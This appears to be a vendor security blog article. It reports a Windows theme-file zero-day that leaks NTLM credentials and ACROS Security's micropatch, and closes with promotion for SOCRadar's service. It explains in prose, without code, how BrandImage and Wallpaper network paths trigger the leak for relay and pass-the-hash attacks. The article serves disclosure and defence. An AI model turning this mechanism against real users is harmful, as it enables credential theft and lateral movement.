Newly Discovered Zero-Day Vulnerability in Windows Themes Files Exposes NTLM Credentials
In a concerning development for Windows users, a newly discovered zero-day vulnerability in Windows Themes files has been reported, exposing users’ NTLM (NT LAN Manager) credentials. This vulnerability poses serious risks for remote credential theft, allowing attackers to exploit the flaw simply by having a user view a malicious theme file in Windows Explorer. Researchers at ACROS Security have brought this issue to light, underscoring the ongoing risks associated with NTLM-related exploits.
New Bypass Detected by ACROS Security
Earlier this year, Microsoft attempted to address NTLM leaks through a patch for CVE-2024-21320. However, Akamai researcher Tomer Peled discovered that attackers could still bypass this patch, leading to the identification of CVE-2024-38030. The vulnerability allows malicious theme files to send network requests containing NTLM credentials to remote attackers without requiring any user interaction. This means that simply viewing a compromised theme file can lead to credential leaks, making it a particularly insidious threat.
ACROS Security has confirmed that this vulnerability affects fully updated Windows systems, including the latest Windows 11 24H2. In response to this critical security gap, ACROS Security has released a temporary micropatch via their 0patch service. This micropatch provides users with a means to secure their systems until an official patch from Microsoft is made available. The vulnerability impacts both legacy and supported versions of Windows Workstation, highlighting the widespread nature of the threat.
How the Zero-Day Attack Works
The mechanics of this zero-day attack are alarmingly straightforward. Malicious theme files can include network paths for properties such as BrandImage and Wallpaper. When a user views such a theme file in Windows Explorer, the operating system inadvertently sends NTLM authentication requests to the specified remote hosts. This NTLM leak is not limited to a specific version of Windows; it affects multiple versions, ranging from Windows 7 to Windows 11 24H2.
Attackers can exploit this vulnerability to perform NTLM relay and pass-the-hash attacks, enabling them to move laterally across compromised networks. The implications are severe, as attackers can potentially gain unauthorized access to sensitive information and systems.
Fortunately, ACROS Security’s temporary micropatch addresses this issue by ensuring that Windows systems correctly detect network paths within theme files, thereby preventing NTLM leaks. This proactive measure is crucial for users who may be vulnerable to this exploit.
How the Micropatch Works
In light of the Windows Themes zero-day vulnerability, ACROS Security has developed a micropatch that effectively mitigates NTLM credential leaks caused by malicious theme files. This micropatch specifically targets the paths in Windows Explorer that would typically trigger a network request to an attacker’s machine when a compromised theme file is viewed.
The micropatch functions by accurately identifying network paths within theme files, preventing unauthorized NTLM credential sharing. A demonstration of this vulnerability was conducted in a YouTube video, where two fully updated Windows 11 24H2 computers were tested. The first PC created a malicious theme file and sent it to the second, unpatched PC. Upon copying the file to the desktop of the unpatched PC, a network connection was initiated, resulting in the transmission of NTLM credentials to the attacker’s machine without any further user action.
However, with the 0patch micropatch installed, the same file transfer did not result in a connection. Instead, the micropatch successfully recognized and blocked the network path within the theme file, ensuring that no credentials were compromised. This demonstration highlights the effectiveness of 0patch’s solution, showcasing how their real-time, targeted patch can mitigate vulnerabilities even before an official fix is released by Microsoft.
Stay Ahead with SOCRadar’s Vulnerability Intelligence
As new vulnerabilities continue to emerge, proactive measures are essential for securing your organization’s digital environment. SOCRadar’s Vulnerability Intelligence provides the necessary tools to stay ahead of potential threats. This feature assists organizations in identifying and prioritizing critical vulnerabilities before attackers can exploit them, offering real-time alerts and detailed, actionable insights.
By focusing resources on the most critical vulnerabilities, SOCRadar enables faster patching and helps maintain robust security. With SOCRadar, organizations can remain one step ahead, protecting themselves from the latest threats.
Conclusion
The recently discovered zero-day vulnerability in Windows Themes files serves as a stark reminder of the risks associated with legacy authentication methods like NTLM. As NTLM-based attacks become increasingly complex, this vulnerability underscores the urgent need for improved security patching practices. To mitigate the risk of credential exposure, both organizations and individual users of Windows should apply ACROS Security’s temporary patch and stay informed about Microsoft’s official patch release.
In an era where cyber threats are ever-evolving, vigilance and proactive security measures are paramount. By staying informed and prepared, users can better protect themselves against the growing landscape of cyber threats.